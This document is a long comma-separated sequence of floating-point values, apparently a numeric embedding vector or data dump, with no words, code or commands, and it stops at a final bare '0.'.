0.0033062107,0.010779817,0.015620748,0.019222885,0.019493636,-0.012837664,0.01185325,0.015604226,0.0007002173,0.009185576,-0.033458628,-0.01829558,0.012528407,-0.011521399,-0.0065166503,-0.0054745176,0.0017394652,0.008464809,-0.01071609,0.019606384,0.0034862154,0.018742895,-0.010332891,-0.0023348378,0.006133765,0.00790186,-0.02521987,-0.003981026,0.0063946345,-0.017912224,0.0072477697,0.018501015,-0.01456295,0.009855233,0.005234745,0.012588052,0.016422348,-0.008262182,-0.024618432,-0.03710434,0.004273239,0.0156542,-0.020559441,0.011893806,-0.0063317535,0.018246757,0.0018696254,-0.009452171,-0.013410967,0.0010897599,0.03134038,-0.00054466235,0.026050095,-0.020819236,-0.009067379,-0.007121957,-0.00594964,-0.005487359,-0.005796165,0.0030983225,-0.0013844388,-0.009704432,0.00460159,0.026072862,-0.008067903,-0.00093737576,-0.0348138,-0.007533643,0.007127094,0.013399587,-0.023134697,0.028021595,0.017578783,-0.014909479,0.005765148,0.017450502,0.010760952,0.0020713191,0.018819278,-0.008640479,0.022865258,-0.0049853926,0.013317701,-0.020670645,-0.010520498,-0.001113284,0.00922212,0.00086937286,-0.0012063349,-0.018759843,0.0138964215,0.009466727,-0.013250462,0.023783326,-0.0010708042,-0.0109441485,-0.023235014,-0.015195837,-0.007109863,0.0052732946,-0.01616296,-0.0034967407,-0.016147563,0.0071093636,0.016318748,-0.01675813,0.014983619,0.08896015,-0.003557253,0.0056084706,-0.016260814,-0.01790558,-0.015503037,0.023782512,0.014827917,0.0036732901,0.003928287,-0.016469844,-0.013560288,0.015559015,0.008653211,-0.0051005185,0.017592298,-0.02529536,-0.018299425,-0.014602974,-0.016987896,0.039145295,-0.013549563,0.011246653,0.029372638,0.018682688,0.021927847,0.014868535,-0.012534547,0.010578789,-0.025410054,0.001560165,-0.0009005816,-0.012934398,0.00772232,-0.033275012,0.017589787,0.0039210515,-0.005554564,-0.03523018,-0.006942731,0.019307008,-0.0013528401,0.003033879,-0.031785958,-0.008877185,0.025453094,0.011163041,-0.019949656,-0.027644461,0.016547566,-0.009802361,0.024923408,-0.018421056,0.02577664,0.011111927,0.023021962,0.0013524838,-0.037135746,0.04409913,0.024046179,0.015230243,0.030090984,-0.0055485917,0.00014386507,0.0082538575,0.009635805,-0.012685892,0.007897733,-0.0034859185,-0.01090334,-0.0118305385,0.01063001,-0.0058168406,0.011676919,-0.0028156145,0.014608879,-0.002500574,-0.004339164,-0.0053447145,0.029050743,-0.022662086,-0.009867921,0.013339007,-0.0121793095,0.0007793378,0.011552519,-0.0022252933,0.018701069,0.024714386,0.0010938311,-0.012231011,0.021430256,0.01821234,0.014405363,0.02755681,0.031780027,0.03047154,0.0217509,-0.012004751,-0.004762702,0.018882671,0.0044588675,-0.0028557947,0.006582894,0.0036667525,-0.0042938665,0.00031261172,0.0065085394,-0.0010558364,0.020287735,-0.01060825,-0.006325138,0.0074771442,-0.024713274,0.003610878,-0.03254424,0.00019494671,-0.008308438,-0.0040404857,-0.007820452,0.034284197,0.01361543,0.016492482,0.012557338,0.001356669,0.006452186,-0.0051930384,-0.0125225615,-0.002785227,0.01193036,-0.008341174,0.02074879,0.028673789,-0.02168727,0.019259663,-0.0029416238,-0.01774393,-0.034350142,0.016152285,0.015941454,0.014736849,0.013238808,0.035291214,-0.016358685,0.016930653,0.017551813,0.048988882,-0.0014674768,-0.017398268,0.004973074,-0.016101208,-0.00419535,0.003433061,-0.009703875,-0.0076361117,-0.004844668,0.019312209,-0.012890833,-0.011989289,0.008550053,0.019940639,-0.026090268,-0.0041600303,-0.010937862,-0.0038922874,0.039192248,0.012008869,0.054375242,-0.0099953,-0.020400569,-0.008357951,0.017417908,-0.010587199,-0.012450235,0.0019050961,-0.025257088,0.017295271,-0.0047365744,0.035439868,0.032234572,0.022207595,-0.017923353,0.004835483,0.008717646,0.008449496,-0.009599225,0.0032715527,0.0074767233,-0.002387863,-0.00072139676,-0.016341377,-0.012748167,-0.00032375313,0.024165798,-0.0027302508,-0.016823515,-0.018376177,-0.019205626,-0.0150246965,0.020039275,-0.0010258377,-0.00049432,-0.0075555933,0.023583755,-0.0012226602,0.0082432525,0.009465011,0.0025070845,0.01816149,0.0001604008,0.021506429,0.029414188,0.013533678,0.010055143,0.0040993174,0.014168299,-0.010546903,-0.0013808185,0.040247146,0.023561215,-0.010531799,-0.02884342,-0.0013807756,0.014729161,0.0029733826,-0.012276828,0.024077937,-0.010724027,-0.017739516,-0.020521535,0.0035852704,-0.010342449,-0.0111849215,-0.011982028,-0.0028072759,0.0011540928,-0.021974271,-0.013681546,0.02769109,-0.0152564235,-0.02432559,0.016906979,-0.0051518534,-0.030763878,0.03193029,0.014079832,-0.025475688,0.0010617995,0.0047763227,-0.0009967361,0.0034934075,0.014447464,0.00023926028,0.011644103,0.00007791752,0.01176112,-0.009773567,0.021131301,0.010435958,0.012261243,0.009397738,-0.005483725,0.008168283,-0.012710888,-0.036581855,-0.007949708,0.013168688,-0.006959401,-0.0007097817,-0.020233449,0.017513383,-0.01972701,0.002508768,-0.0037711414,0.0037039595,0.01906097,0.0018551946,0.0020286376,-0.05411202,-0.005264589,0.015863646,0.011367259,-0.018278083,0.037413813,0.029269768,0.0027168924,0.0033799256,0.0066168024,-0.022521328,-0.016367042,0.0041417913,0.0047538998,0.0046746642,0.0005065131,-0.04349338,-0.022007296,-0.012533834,-0.027363772,-0.01807437,0.049794268,0.01093715,0.0012709642,0.007650191,-0.0027740048,-0.006517096,-0.003830348,0.0016750722,-0.03256303,0.009993794,0.008464543,-0.008395158,0.016049465,0.02257388,-0.0048479806,-0.004010504,-0.015448934,0.0014649001,-0.0067253606,-0.0049291286,-0.013348995,-0.016951371,0.01620692,-0.02004003,0.019571245,-0.017856048,0.03481431,-0.0009240479,0.028484108,0.014204004,0.018277584,-0.0038524463,0.01417473,-0.03408191,0.012642711,0.013956244,0.026306562,0.009652312,0.0063895206,-0.008478356,0.010980532,-0.00096051564,-0.012236191,-0.0010348835,0.003610271,0.04435223,-0.00271245,0.022917671,-0.012268222,0.012341854,0.023429794,0.0094999345,-0.0011095054,0.028495183,0.0059050354,0.0035522145,0.018388389,0.00092164346,0.001053215,-0.022762414,-0.017039066,-0.0019992988,0.029158887,0.034360647,0.008273413,0.011960043,0.013662204,0.0037381405,0.0051798974,-0.018254602,-0.0072912113,-0.010436569,-0.020356689,-0.006865625,-0.015341053,-0.006053413,-0.03326504,0.0026830873,0.024396483,0.00019635056,-0.011820347,0.0037209226,-0.020792032,-0.0069868504,-0.023283634,-0.036317766,-0.0071260105,-0.009465578,0.011891039,-0.024957055,-0.0017522783,0.016589107,-0.004197597,0.0042623617,0.009235045,-0.015119994,-0.009410728,-0.013500467,-0.013763588,0.012291189,0.011915468,-0.003471315,0.019617189,-0.0009190639,-0.008839724,-0.01944237,-0.007876239,-0.008682071,-0.00452702,0.0077569145,-0.013926502,-0.010490235,-0.00071978616,-0.018615164,-0.02357646,0.01050941,-0.03756851,-0.022439562,0.0024096759,0.015351377,0.00004568169,0.008817003,-0.014149023,0.009806053,0.022776717,-0.015252697,0.0029709165,0.012180635,-0.0036035697,0.03317547,0.032137576,-0.01018487,-0.012834963,-0.02703906,0.019991733,0.00008660414,-0.0037440553,-0.006479225,-0.0156343,-0.021269249,-0.028336821,0.002460272,-0.026501328,0.009255427,-0.0041055293,-0.029426055,0.012250087,-0.0058374954,0.011702556,0.013072874,0.0089912815,0.003999772,-0.0017769864,-0.0046226233,-0.02831596,-0.028924277,0.020451155,-0.01620114,0.012553044,0.010565716,-0.01881666,-0.013121523,-0.024929484,0.012934535,-0.011433363,0.017175537,0.0019390348,-0.01282587,-0.032226842,0.0099418,-0.027157921,0.01370191,-0.031882413,0.008149975,-0.005291823,-0.0016733769,0.007250031,0.012394128,-0.03686261,0.022501899,-0.0068548443,-0.029472394,0.025012724,0.011264523,0.01114304,0.003083468,0.005326124,-0.0086051375,-0.024427671,0.016019855,-0.023221122,0.0036687716,0.02667331,-0.004309754,0.019342333,-0.006591751,-0.0019187969,-0.027134368,-0.008631389,0.023208197,-0.010476213,-0.0029447477,-0.009520281,-0.0054571074,0.007026711,0.0061933063,0.03271086,-0.00078313565,0.0073911436,0.024846578,-0.009000485,-0.028149344,-0.0037666936,0.015003468,-0.0026927982,-0.00871532,-0.0018028688,-0.009183493,0.025777867,0.033580586,-0.028220166,-0.0076180403,0.021227531,-0.0058381907,-0.0117075415,0.017348122,0.009020244,-0.007068038,0.00016444984,0.019144196,-0.023673236,-0.01949942,-0.016557032,-0.010310786,0.011116307,-0.010254419,0.0029273117,0.0005663729,0.01346311,0.016159466,0.0008791226,-0.010128195,-0.012544137,0.016727036,-0.0053214463,0.00026400646,0.023652315,-0.011387242,-0.0006562194,0.0117188515,0.00468366,-0.0069819014,0.0011460126,-0.0141203,-0.0067386893,-0.0044110557,-0.0037964329,-0.005295297,-0.001849661,-0.011871272,0.0054307277,0.0075432104,0.0059438543,0.009072943,-0.0125438,-0.018526688,-0.0061741434,-0.008708966,-0.015018382,-0.008621247,0.01681475,0.024103269,-0.015074916,0.0018821502,-0.006313187,-0.06556678,0.020488815,-0.020621995,-0.008283729,-0.007700607,0.006630303,0.0055436213,-0.0031668486,0.032290827,0.0015339099,-0.0039490703,0.0014256764,0.015779447,0.010885249,0.0073592523,-0.024600882,-0.008531224,-0.0036356146,0.011851296,0.00052147545,0.0008593782,-0.005560275,0.01102248,0.005637658,0.046110984,0.0070688045,-0.025765108,-0.013906769,-0.01988515,0.009910179,0.0028763982,0.024178712,-0.0021373145,0.005801601,-0.0074948277,0.009127594,0.017411886,0.021434361,-0.005009857,0.0014996883,0.0027561053,-0.002653819,0.0044224565,0.03009865,-0.011542674,-0.02778068,0.008558937,-0.00079766935,-0.0024616574,-0.010220903,0.0019822367,-0.014784144,-0.01248111,0.023569213,-0.00621299,0.021470971,0.007911437,0.0020351321,0.025851445,0.0110503165,0.0026996513,-0.0055198837,0.032163374,0.010559766,-0.028565923,0.006361494,-0.0025895867,0.043947913,0.0013962681,-0.005233635,-0.024086883,0.0042563253,-0.015045216,-0.0032058554,-0.029040318,0.023171514,0.0012285855,-0.019110953,-0.00025538704,-0.02059483,-0.012541844,0.008921063,-0.015525433,-0.00048052197,-0.03319803,-0.021624759,-0.010144374,-0.006522583,-0.0052043493,-0.0032926102,-0.013310219,0.00401371,-0.0029943523,-0.014468927,0.0019306964,0.014466814,-0.0051472974,-0.0074513163,0.007688694,0.0074547497,0.030015115,0.000071048926,-0.0053180405,0.05219778,0.0074822926,0.0009824326,0.02252324,0.015678724,0.025907151,0.020324817,-0.0060187867,0.00045015686,0.0068735466,0.022686709,0.0026234954,-0.0014560686,-0.007193249,0.021948697,0.01315908,0.015286811,-0.005528195,-0.012746223,0.020201152,0.009037481,0.027520103,-0.007786642,0.0060810437,-0.0040852074,-0.02199896,0.0052067833,-0.00761837,0.0033884218,0.00888758,-0.0073448126,0.012311762,0.006092843,-0.0009856534,-0.018785508,-0.0051504755,0.009094522,-0.029285524,0.00941354,-0.020777367,-0.00054831215,0.0092492215,-0.024746174,0.000093967785,0.006445596,-0.000100095,0.00034413635,-0.0043806387,0.014441287,0.005844733,0.0073890598,0.0007550544,-0.012448819,0.019442465,-0.009289286,-0.013072611,0.012676853,-0.004336672,-0.025869122,0.012765429,0.015140227,-0.038645275,0.016016152,-0.0045713214,-0.006603675,-0.01638666,-0.01837619,-0.0009791747,0.014669773,-0.0025864602,0.05538846,0.013048734,-0.016639033,0.021633862,0.014185465,0.0014576932,0.030104907,0.0025187244,0.034368854,0.015974691,0.008775574,-0.011245886,-0.005185065,-0.009990473,-0.028073432,-0.030770589,-0.0066769165,-0.02313247,-0.014843828,0.011535013,-0.0024224564,-0.016077256,0.046322137,-0.019984497,0.01603531,0.008685025,-0.007216541,-0.011945931,0.01878928,0.008323245,0.0021698894,-0.013732586,0.020138806,0.019189399,-0.032546084,-0.0008335364,-0.00830329,-0.01629838,0.005689182,-0.010113941,0.012449259,-0.0029845259,-0.019014115,-0.02485088,0.004198748,0.00544744,-0.023270372,0.016322134,0.03868196,0.016854754,-0.00006599813,-0.007483159,-0.025214614,0.014581571,0.025248745,-0.0071773827,-0.0034479054,0.027650522,-0.01793609,0.015519103,0.030790376,-0.020161511,0.022858988,-0.0063757137,0.00074722944,-0.014168601,-0.009389201,-0.0005771089,0.009291475,0.021179486,-0.02164398,-0.014936306,0.040385395,-0.002859811,-0.005697947,0.013144584,-0.0031217716,-0.006793425,-0.0065663015,0.024088725,0.013318668,0.0033962163,-0.008420457,-0.033053726,-0.010971554,-0.027400842,-0.008115334,-0.013245484,0.002254872,-0.0129214,0.0018610337,0.022779213,0.008775939,0.012238967,0.016306749,0.025241286,0.005945745,-0.01645753,-0.014142751,0.013997875,0.0155700855,0.008111949,0.014295512,-0.024291229,-0.004724708,0.009543829,0.011067461,-0.0077060875,-0.0066761044,0.0016503457,-0.02361958,0.01587781,0.010904016,0.027300779,-0.022692703,-0.0097210575,-0.0014612753,-0.026381848,-0.016179942,-0.00013321935,0.009526021,0.020166004,0.007595569,-0.01047236,0.002413047,-0.016174465,-0.014571473,0.08464924,-0.037386432,0.011691248,-0.010926884,0.0070051574,-0.008339233,0.012766761,0.009306973,0.01580096,-0.0052389214,-0.02842479,-0.0196764,-0.033028856,-0.009453893,0.0032526725,-0.012644852,0.026254615,-0.001707121,-0.0026038468,0.021868,0.005455307,-0.0034042117,0.0035880615,-0.015888715,0.011965267,0.008470761,0.017122118,-0.01000657,0.031317078,0.011850323,0.0009744593,-0.009232186,0.022152333,0.0063803014,-0.000596757,0.0015772813,0.0012168982,-0.019988164,-0.035043743,0.011808964,0.004306158,-0.008443956,0.016490432,0.016756307,0.028558495,-0.02099346,-0.018027417,-0.0023275593,-0.0033143724,-0.0046482948,-0.013023752,-0.009814086,-0.008339964,0.0026262975,-0.029999664,0.020601109,-0.0071085016,0.032533024,0.031696033,0.00026682788,0.01340122,0.017827932,0.002613551,-0.022713061,0.0033521676,0.011825789,0.012992976,-0.02167504,0.016370691,-0.01678583,0.022661403,-0.005210626,0.0028376481,0.01745765,-0.010119564,0.0076466217,0.018186534,-0.015736714,0.010030725,-0.026444308,-0.00964592,0.006528268,0.020487396,0.00821108,-0.0021843216,-0.0024426708,-0.023214694,0.015579226,0.05153013,0.0045406125,0.018273637,0.0015024852,0.007791098,0.034387577,0.0048110113,0.019936215,-0.01665586,0.017126374,-0.021641208,0.0018198846,0.00013158061,-0.004329962,0.011570412,-0.014656668,0.018400941,0.010055059,-0.0016040715,-0.007161948,0.0111315865,0.052016236,0.014084022,0.019586828,-0.0026868454,0.014695135,0.01103171,-0.0056756935,-0.005310234,-0.0061445893,-0.008408516,0.0110399565,0.014158556,-0.009369958,-0.02527701,-0.04385394,0.0003040754,0.15459003,-0.0040208176,0.006073015,0.024014847,0.003205159,0.003570998,-0.14778154,0.005578812,0.0085529685,0.013134674,0.0008285675,-0.018613027,-0.010226878,0.024121674,0.01779459,-0.0017598532,-0.0072500706,-0.024471918,0.01534328,-0.011437299,-0.018620586,0.018453145,-0.009067828,0.003873544,-0.02240483,-0.0018241907,-0.0055433754,-0.0051817577,0.007144163,-0.02232914,-0.0035543842,0.009983907,0.011896692,-0.02652329,-0.017839214,0.0084453905,0.020254716,-0.01852747,-0.019531019,-0.0036236674,0.035435922,0.0037291036,-0.028506933,-0.020052563,-0.15892677,0.00939516,0.005677794,-0.04056081,0.023258332,-0.024494063,-0.013432667,0.009706252,0.0052133272,0.0062977327,-0.01120471,0.015228686,-0.021017184,-0.013527258,-0.038609274,-0.008554953,-0.001010353,-0.0013347433,0.0020710218,0.003776229,-0.012032612,-0.0062078917,-0.036120437,-0.021478716,-0.017720653,0.0011678905,-0.0005810244,0.040014055,-0.0024393825,-0.0050876625,-0.021594673,-0.005769492,-0.021952242,-0.010839892,-0.009967674,-0.023704216,-0.002259164,-0.022601707,-0.015383268,0.018120205,-0.0065475283,0.007594141,-0.02175275,0.009164547,0.0023324166,0.026918942,0.0006406787,0.0055956575,0.009870188,-0.004063953,0.017145853,0.009528989,0.00035923827,0.0070891394,0.0055963723,0.0138017135,0.0021565715,-0.014126992,0.00080951396,0.005295945,0.0004698453,-0.009106759,-0.014085779,-0.0027755403,0.016887246,0.0013496692,0.008973597,-0.030419938,-0.00007858447,0.01569461,-0.0032404035,-0.0016554727,-0.004485143,-0.017345764,0.012665591,0.009269613,-0.008661109,-0.0033748043,0.010858922,-0.01273239,0.006871175,-0.009554411,-0.006247196,-0.030936701,-0.0011181149,0.0031645054,-0.005226947,-0.0077502504,-0.0001581724,-0.0053258673,0.045613702,-0.015438682,0.017378688,-0.0068600317,0.024576155,0.013356527,0.05516561,-0.0030481953,-0.033121724,0.008719328,0.009355816,-0.02324829,-0.019023957,0.004583756,-0.019316388,-0.0034721887,0.0019069205,-0.009139553,-0.011611456,0.009964752,0.0042592008,-0.014741191,0.027727135,-0.012150962,-0.028989026,-0.019106764,0.015586822,0.005137465,0.0031827283,-0.021733679,-0.028570242,0.029903136,-0.0012546845,0.000270334,0.040377278,0.0057175276,-0.032786995,-0.0077724922,-0.00014265449,0.019212844,-0.02816712,0.016810833,-0.003326298,-0.011588405,-0.017631985,-0.017357863,-0.017641695,0.0083781155,-0.026830986,0.013274427,-0.00030870762,0.010357314,0.0010829908,-0.007939482,0.0044267364,-0.02791462,0.01823547,-0.011197991,0.012965841,0.002866906,-0.012126008,0.027022319,-0.016423462,-0.01940277,0.01943426,0.062942,-0.0043604365,-0.01305326,0.02117049,0.008497729,-0.0046474524,0.023691447,-0.01905068,-0.023969691,-0.0062268386,-0.032413945,-0.009649463,0.010110869,-0.004000357,-0.009221928,0.007110684,0.010312569,0.022407703,0.004571522,0.013896187,0.013600657,-0.03080351,-0.0052905865,0.034962974,0.009143627,0.019721627,0.0077382606,0.005500235,-0.0034460912,-0.004279543,-0.0055052997,-0.009620048,-0.016950479,0.008200852,0.002446581,-0.027705703,-0.031251106,-0.011766629,0.0011734316,-0.003835034,0.0025363015,0.019479401,0.017311083,-0.018637145,0.0054952726,-0.021843618,-0.016833676,0.009880286,0.013107371,-0.021643756,-0.0035507053,0.026232952,0.006409998,-0.016619539,-0.010971891,-0.00571134,-0.00459629,-0.0061277496,-0.0022115351,-0.014403727,0.037630346,-0.022004746,-0.0057266736,-0.0029282656,-0.016191045,0.0037157026,-0.018110922,0.0016917418,-0.0025277406,0.012486737,0.0014757711,-0.008216751,-0.026450723,0.014621647,-0.004362634,-0.027330412,-0.023009444,0.0210762,0.0047864197,0.019873826,0.021378893,-0.0068552885,-0.00012499963,-0.005332727,-0.013735366,-0.038888026,-0.0043063574,0.034818202,-0.029526507,-0.015511181,0.008705964,0.0019590983,0.032830354,0.0011251598,0.016450467,0.015959885,0.01212872,0.010282808,0.0188159,0.0061301757,0.019674523,0.0041905493,-0.010727038,-0.0032319385,-0.001413142,-0.02316566,-0.0051328354,0.0076207826,0.018836522,-0.006425535,-0.016834067,-0.009860985,0.0011043572,-0.038846664,-0.0006760256,0.019397564,-0.01789848,0.002581771,0.021497352,-0.006336485,-0.027672324,0.017362,-0.0035051783,-0.029715838,-0.0021521857,-0.019807763,0.015030356,0.010954386,-0.024448715,0.018549424,-0.005637371,0.0027184533,0.004916818,-0.010768269,-0.0031925032,0.011825689,0.012718432,0.012211319,0.0042032925,0.016780531,-0.03211549,-0.014114072,-0.0038559441,0.0024879745,-0.007118499,0.0030803557,0.0061642104,-0.0049231476,-0.021023203,0.0023345773,-0.011885788,0.03274926,-0.00033556318,-0.0077218036,0.017778082,0.026180977,-0.0010114646,-0.008162074,-0.0043517617,-0.012489856,0.011027254,0.031920053,-0.03170596,-0.001712494,-0.020847967,0.022849517,0.017763572,0.009597629,0.027711542,0.0028740861,-0.007025973,-0.012532034,0.010711459,-0.004881637,0.012493724,-0.021188492,-0.00488401,-0.0028941424,-0.020469965,-0.014596551,0.015358672,0.003126354,0.00924671,0.008473377,0.0051293997,0.011384546,-0.005315985,0.031056395,-0.0007878478,0.01442313,0.0053419704,0.009710153,-0.011614211,-0.00742173,-0.027575584,-0.020854002,0.00587594,-0.028302087,0.004984383,0.013551783,0.012067899,0.021781309,-0.027266724,-0.012443138,0.010373463,0.007379906,-0.013836813,-0.03492414,0.0025701688,-0.028022716,-0.012292676,0.008149993,-0.014569242,0.016925767,-0.0018648304,-0.012601739,0.0029641709,0.026897369,0.013466008,-0.021303104,-0.0103527745,-0.0015940625,-0.011827539,0.014399039,0.005765874,-0.018134788,0.00031721036,0.026369544,-0.013765494,0.019141458,-0.008893371,0.025517754,0.027361074,-0.016039368,0.006259007,-0.012689225,-0.012822196,-0.00873697,-0.023227407,-0.0016566318,-0.0050505036,-0.03727371,-0.021562234,0.03086495,-0.0025824988,-0.006993797,0.008431966,0.0032222958,0.006503073,0.0310819,0.009517308,-0.0030893057,-0.02585414,-0.014448783,0.009292456,-0.009162509,0.002412628,0.011860777,-0.032170482,-0.044216156,-0.0018545866,-0.019841459,-0.008068664,-0.012527962,-0.0013070194,0.002290766,-0.0025241163,0.033613637,0.014174841,0.006754647,0.0032608625,-0.010043191,-0.016263945,-0.010207646,0.0029977462,-0.012117896,0.0066467454,-0.020128023,0.012402605,0.024574082,0.011863112,-0.023192953,0.022498414,0.014953053,0.0021953217,-0.0053047356,-0.0032222406,0.012719305,-0.010084695,-0.014996281,-0.031311695,0.009327099,0.004051901,-0.016888842,-0.015268876,-0.015556845,-0.014188196,-0.0027147369,0.003965979,0.0133251455,0.011168263,-0.008047133,-0.00066958903,0.0149385035,0.008609754,-0.01155797,0.01678927,-0.00016702994,0.009226396,-0.0045841974,-0.009134936,-0.014174756,0.029155424,-0.004810698,0.008128491,0.00547536,-0.0017212734,0.052260913,-0.00055929995,0.022225387,-0.0057303365,-0.013264493,-0.0023109764,-0.0023154325,-0.028966617,-0.0018087293,-0.017552696,-0.0057173315,-0.0005742935,-0.022670353,-0.0018128228,-0.025077896,0.010233021,-0.12774177,0.013961867,-0.02127574,-0.020957751,-0.012868012,-0.015086712,0.008108419,0.015449392,-0.014956966,-0.02308118,-0.004848217,0.026070813,0.010398654,-0.010851249,-0.0111772185,0.007335459,-0.027661238,-0.0041742153,-0.010889356,0.021536032,-0.0011128611,-0.0088970475,-0.0034850263,0.00015706949,0.016195105,0.014809621,0.0024530403,0.035949916,0.013188993,0.015042273,0.0061821793,0.016134178,0.0011705018,0.018868838,0.0042080213,0.0040254584,-0.015223895,0.004561799,-0.014846265,0.014764378,-0.008667747,-0.003546384,0.015421762,0.0036147672,0.0006940474,0.008386078,0.018924456,0.031612944,0.024584021,0.018358048,-0.0037342461,-0.010051221,-0.0030541865,-0.007879492,-0.016011978,-0.0029144783,0.007974839,0.0050011985,0.00534162,0.010510905,-0.010106558,-0.02299316,0.008783487,-0.016291736,0.019088587,0.0077880826,-0.009218674,0.0071520656,-0.035662398,0.013333815,0.00638204,0.034951933,-0.01050725,0.008715106,-0.025798341,0.015370622,0.007597013,0.012712622,-0.00058652373,0.034337617,-0.040999386,-0.0037296389,0.013720744,0.035851493,-0.020339405,-0.022876345,-0.014636398,-0.0068170982,-0.009724831,0.012361428,0.017577505,-0.0005109358,-0.006410299,-0.02526205,-0.004605277,-0.00430223,-0.012168775,-0.0024223088,-0.018095544,-0.011618507,-0.005285158,0.008195235,0.0026578272,-0.01378214,-0.14472225,-0.01364881,0.03294206,-0.019403432,-0.0020102563,-0.014049855,0.015965082,-0.0008106603,0.016080666,0.016021,-0.0060847327,0.015958035,-0.023532303,0.007675384,0.0059195696,-0.007326159,-0.0345467,0.0036494185,0.005490217,-0.019405428,0.0002598706,-0.02543763,-0.000023049939,0.016435629,0.027883904,0.013103234,0.012268953,0.026302926,0.029857887,-0.010602405,-0.0056592315,0.01367874,-0.006585223,0.0014746159,-0.046714194,-0.003681797,-0.00037325622,-0.019245585,0.0013908094,0.01647675,0.013414306,-0.0014057836,0.03348142,0.0076494133,-0.0036716016,-0.0258788,0.015849203,0.03529371,-0.0075120083,-0.0074294605,0.010016425,0.0010221724,0.004808265,-0.009964466,-0.008966311,-0.017566627,-0.0019422858,0.00026493846,0.021763256,0.01675864,0.0069502788,-0.003793528,-0.0016424013,-0.018275099,-0.0032665143,0.011091232,-0.0051141763,0.004469088,-0.008164017,0.008934952,-0.012668165,0.027581844,0.015346235,-0.02014712,0.01922671,0.01263505,0.010938717,0.025705399,-0.0045345263,0.0023227516,0.019262675,-0.015984518,0.010981889,0.03773409,-0.032408867,0.027970249,-0.007135289,-0.010761059,-0.0087581,0.008348208,0.024655122,0.014310908,-0.001104486,0.03331918,0.023577794,-0.008173212,0.05170168,0.007680822,-0.023008905,-0.011559321,-0.0018356513,-0.016940214,-0.01589823,-0.00038423142,-0.023401814,0.0037453442,0.038075417,0.0058689294,0.008262859,0.0063387887,-0.0023309118,0.035199888,-0.02993504,0.024391862,0.0044190497,-0.000051137835,-0.016152218,-0.013656286,-0.030394655,0.0018856083,0.02412602,0.0050868224,-0.008810752,-0.002823466,0.0032629275,-0.0106839165,-0.032345135,0.010827105,0.005099386,-0.026419008,0.0040841224,0.0065581887,0.004749325,-0.0113870455,-0.0036481316,0.01419456,0.0038587865,0.00047575793,0.008699929,0.010237396,0.0020339312,0.009189146,0.0011210636,0.0010008223,-0.0030339414,0.011316173,-0.011622019,-0.011440109,-0.0129184155,0.009588783,-0.00079334277,-0.012188952,0.026706146,0.025102926,-0.0031949629,0.006730269,0.00022906963,-0.006260666,-0.01037968,0.016535232,-0.0075652935,0.027465161,0.019140933,-0.02810435,0.0002851284,-0.0037313767,-0.003932839,0.014238895,-0.005745865,0.01616229,-0.009226502,-0.006720724,0.009983743,-0.057114217,0.017385224,0.0038656157,0.023690604,0.0069716317,0.020729875,0.005831636,-0.026122412,0.009503863,-0.017864605,-0.006984661,0.011841446,0.01230187,0.00213473,0.003641253,-0.001950592,-0.010860595,0.031369112,0.0011078399,-0.008304176,-0.015277633,0.0034129987,-0.009361347,0.00015094838,0.012474776,0.01141218,-0.0043747174,-0.027271654,0.0076904055,0.007920625,-0.0147457225,0.012004674,0.010315928,0.003125677,0.038429312,0.015439383,-0.011618468,-0.00053441536,0.015567596,-0.016840566,-0.0030239855,0.012726172,0.021289699,-0.019895999,-0.024881562,0.021697143,0.001460313,-0.002271646,-0.01607364,0.016868098,0.009214422,-0.01781913,0.047831938,0.028435325,0.03038777,-0.03151436,-0.0044503044,-0.0055449223,0.0053876215,-0.028626699,-0.0096291555,0.008231689,0.008931892,0.024876704,0.02021623,0.01173868,-0.000825414,0.016386889,-0.0020692619,0.02712352,0.02809081,0.027419021,0.0024874608,-0.006406904,-0.012995304,0.019988565,0.03772916,-0.0034648266,0.003255722,-0.0037438127,-0.026549691,-0.0036968302,0.01134506,0.023947708,0.018473864,-0.00985237,0.011356293,-0.022562725,0.0075353323,-0.025911905,-0.01660588,-0.011097347,0.004445749,0.002582694,-0.02047268,-0.0036321662,0.00415447,0.025489666,-0.0007524846,0.016320957,0.041351277,-0.007026111,-0.011597743,0.014171248,0.00200085,-0.003840571,0.0052153603,-0.0012657902,0.00065736024,-0.01689133,0.0020422246,-0.013724436,0.01672813,0.0061681108,0.0024524964,-0.013292951,-0.004186209,0.011574783,-0.018309094,0.0050394596,0.0040187943,0.0034185578,0.0063788346,0.012812199,0.0024959096,0.009912244,0.012339773,0.0062175407,-0.022214383,-0.00968569,-0.0047979276,-0.006384359,-0.0040181456,0.0010755594,0.018901113,0.012703022,-0.01758654,-0.022895107,0.01240848,-0.006585471,0.012011574,0.0063648727,0.01157797,0.0056898603,0.0035082756,-0.050760806,-0.013696187,-0.0096654855,-0.015085624,0.027205413,-0.016762318,-0.0000037808825,-0.006091545,0.0033144092,0.04221473,-0.005433468,0.0021264465,0.010269764,-0.02305499,-0.002726752,-0.009952746,0.01883704,0.0064586652,0.0073908577,0.026202334,-0.020247422,0.012923435,0.0023861274,0.009129974,0.0018175471,-0.0022798453,0.0026702005,0.018140672,-0.0029617036,-0.003089558,-0.015982922,0.009205139,-0.0017235063,-0.0055892025,0.0076947478,0.0041396525,-0.023500687,0.025257615,-0.032381535,0.010248447,0.009516806,-0.008398827,-0.017753528,0.004511332,-0.006339702,-0.0315733,-0.001996028,-0.013085323,-0.009795064,-0.0077357246,-0.030754225,0.012178017,-0.0068061342,0.012698065,-0.030612994,-0.016495707,0.009726965,-0.09028778,-0.008781756,0.02457268,0.012806314,0.039691605,-0.0073147397,-0.015215244,-0.008986613,0.010167254,0.009507564,-0.012072568,-0.008986618,-0.01266769,-0.0038896971,0.03716462,-0.015010912,-0.011038362,-0.0005652736,0.0010913407,-0.033966433,0.013311809,-0.010681343,-0.020542895,-0.004786149,0.0053976118,-0.00044445478,0.015226722,-0.011988203,0.0049802638,-0.0012480929,-0.009309571,0.0073096277,-0.006606295,-0.008207004,-0.014233818,0.00081322563,-0.014312398,0.0025665732,-0.03115476,-0.02684922,0.0038776647,0.0018847893,-0.0015517832,0.012010897,-0.036432523,-0.0036769009,-0.043300528,0.0014409056,-0.0022920498,0.015599951,-0.012054466,0.020730937,-0.0149051165,0.024346419,0.005287047,0.025529416,-0.0031644313,-0.004011009,0.034918115,0.0043239133,-0.014971804,0.003364828,0.020780826,-0.006725854,0.009163413,0.0037850267,0.006501723,0.014724456,-0.0073993774,-0.012571879,-0.014529013,-0.008123817,-0.0065902523,-0.007431913,-0.0049146465,0.0061018327,0.007321013,0.016576486,-0.024122508,-0.0039092912,0.033071924,0.0025660025,0.03459268,0.006186167,0.009052186,0.023862937,0.017173376,0.008004035,0.01370286,-0.008900257,-0.01812939,-0.0053038755,0.019962683,0.001193225,0.0055807447,0.0074385214,-0.012805243,0.0